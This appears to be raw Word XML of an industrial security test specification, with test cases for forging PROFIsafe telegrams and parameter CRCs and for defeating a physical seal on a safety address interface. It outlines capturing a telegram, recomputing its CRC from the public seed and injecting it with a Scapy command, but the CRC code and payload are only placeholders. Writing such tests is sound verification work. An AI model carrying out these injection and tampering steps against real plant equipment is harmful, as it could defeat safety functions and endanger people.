      <w:tr w:rsidR="00BD26D7" w:rsidRPr="006D5B99"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BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="595E3D99" w14:textId="5AEC3697"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Wireshark; own implementation of the PROFIsafe CRC computation (4-byte CRC, CRC-Seed24/32, documented in the GSD file / PROFIsafe specification)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD26D7" w:rsidRPr="006D5B99"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BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5204DF03"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Capture a legitimate telegram (as in TC-RQ001-03, Step 3-4).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEC542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Modify the process-data field.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="486427E4"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Recompute the 4-byte CRC over the modified data using the documented</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455B2E9E"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and the public CRC-Seed24/32 (from the GSDML file):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5618469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cm_rq002-03_crc_recalc.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C596EA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implement the PROFIsafe CRC algorithm here (seed = CRC-Seed24/32 from GSD)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF75F1B"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input: modified process-data bytes + F-parameters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66083F4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output: valid 4-byte CRC value for the modified payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6570C15D"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1B6F191"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cm_rq002-03_crc_recalc.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525E06EA"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4a. Parallel injection WITHOUT producer suppression (NV1, collision test):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3C2488"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 &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A527A5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392BCB59"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sendp(Ether(dst="AA:BB:CC:DD:EE:FF", type=0x8892)/Raw(load=b"..."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6024DF3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iface="eth1", count=5, inter=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0193F835"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4A5B7B6" w14:textId="77777777" w:rsidR="00BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D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4b. If NV3 is available: repeat with full producer suppression (reuse the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A3370BD" w14:textId="04858C47" w:rsidR="00BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D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bridge/NFQUEUE setup from TC-RQ001-04).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD26D7" w:rsidRPr="006D5B99"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BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7D5AC4" w14:textId="1D430C89" w:rsidR="00BD26D7" w:rsidRPr="006D5B99" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">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parallel injection without suppression causes a collision/rejection (no device fault); with full in-path suppression (NV3) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">the telegram is accepted </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-1 (black-channel boundary of authenticity).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46BE284B" w14:textId="77777777" w:rsidR="00EE3FAA" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3FAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C87EFC" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3012FB" w14:textId="1A028E55" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ002-</w:t>
      </w:r>
      <w:r w:rsidR="001606CE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00E07162" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parameter-Integrity Forgeability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48551661"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0831AB6D"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162CE842" w14:textId="79D2C2DA"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RQ-002 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.4 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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6B4394F4" w14:textId="5AF49E8B" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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3DA4C12E" w14:textId="6B98C7E9" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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EE682A" w:rsidRPr="006D5B99"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2D852CED" w14:textId="095C549F" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="0049679F"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Establish analytically that F_ParCRC (16-bit) is exhaustively searchable and iParCRC (32-bit) is recomputable, both error-detection, not authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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192257C7"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Determine the bit-length and algorithm class of each parameter integrity value from documentation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558E3B11" w14:textId="77777777" w:rsidR="00AF138F"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Argue the computational feasibility of forging each (search space vs. deterministic recomputation).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A6678F" w14:textId="4C7CE9D8" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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Conclude on cryptographic forgery resistance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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16EB5728" w14:textId="77777777" w:rsidR="00F2478F"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Analytical finding. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="170B7141" w14:textId="4C971709" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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both parameter integrity values are forgeable (no cryptographic resistance), confirming they are error-detection, not authentication, mechanisms. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="213AC076" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F623D7" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC9D90E" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1098C1C9"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21A893EC"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4CF3A916" w14:textId="180256D8" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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TC-RQ002-0</w:t>
            </w:r>
            <w:r w:rsidR="001606CE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351DD1" w:rsidRPr="006D5B99"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351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4258BF8A" w14:textId="325A77EA"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document review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351DD1" w:rsidRPr="006D5B99"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351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB7126A" w14:textId="53B72998" w:rsidR="00351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">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No special tools required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351DD1" w:rsidRPr="006D5B99"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351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E10C89C" w14:textId="790892CC" w:rsidR="00351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00D94AA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F_ParCRC = UINT16, iParCRC =</w:t>
            </w:r>
            <w:r w:rsidR="00D94AAD" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UINT32 and 4-byte CRC, CRC-Seed24/32, publicly documented in the GSD file, record the value ranges / computation basis.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04ECC3A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Estimate the search space, e.g.:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1A428C"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"print('F_ParCRC search space:', 2**16); print('iParCRC search space:', 2**32)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C77B1C7"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F_ParCRC (2^16 = 65,536 values) is exhaustively searchable in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EBEC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milliseconds; iParCRC (2^32) is directly, deterministically recomputable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E1549F"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the publicly known iParameters (no brute-force needed, since the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16782ED5" w14:textId="77777777" w:rsidR="00351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD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algorithm + seed are publicly documented).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5505A7F6" w14:textId="1BA95768" w:rsidR="00351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD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4. Document the conclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351DD1" w:rsidRPr="006D5B99"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351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A3C395" w14:textId="7F2727D8" w:rsidR="00351DD1" w:rsidRPr="006D5B99" w:rsidRDefault="00351DD1" w:rsidP="00351DD1">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 xml:space="preserve">Expected: both values are forgeable (no cryptographic forgery resistance) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-2 (error-detection only, not authentication).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="673A9341" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779DA4CA" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F0B8C3" w14:textId="3F9CB7C2" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ002-05 - </w:t>
      </w:r>
      <w:r w:rsidR="00F2478F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Physical Tamper-Resistance of the Address/Mode Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECBDF2" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682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6D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB86BC5"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="607F0E5D" w14:textId="25F83E30"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RQ-002 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 3.11 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6B3CD2" w14:textId="3DADA04D" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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E682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765F372A" w14:textId="5A5615A6" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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EE682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B386A24"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Assess the protection against physical corruption of the safety address/mode interface: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63385608" w14:textId="77777777" w:rsidR="00E05143"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(a) confirm the temporal protection (a runtime change is ignored until restart, so the running safety address cannot be corrupted live), and </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07808B40" w14:textId="52A22975" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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(b) determine whether the stored/next-restart value can be corrupted by physically altering the interface, with the seal as the only resisting barrier.</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7859B018"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baseline address and seal state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C575AB"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defeat the physical seal and alter the interface; verify the running address is unchanged.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693FE42E" w14:textId="77777777" w:rsidR="00E05143"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 cold restart; confirm whether the altered value now takes effect.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC99003" w14:textId="5321A85A" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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Assess whether the alteration required visible seal damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE682A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00EE682A" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="453C31B9" w14:textId="332D3A75" w:rsidR="0021004D" w:rsidRPr="006D5B99"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57D9E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. Expected:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2FFC7A" w14:textId="7DF5C8FB"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runtime change ignored (temporal protection = a genuine partial mitigation to credit); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0395B099" w14:textId="761B56D7" w:rsidR="0021004D"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after restart the altered value applies </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the stored value is physically corruptible; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4140A642" w14:textId="12F19C69" w:rsidR="00EE682A" w:rsidRPr="006D5B99"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 the only resistance is the passive seal, with no active tamper-detection/response </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms resistance-only physical protection (partial EDR 3.11 result).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21B0A668" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10ECA619" w14:textId="77777777" w:rsidR="00EE682A" w:rsidRPr="006D5B99" w:rsidRDefault="00EE682A" w:rsidP="00EE682A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
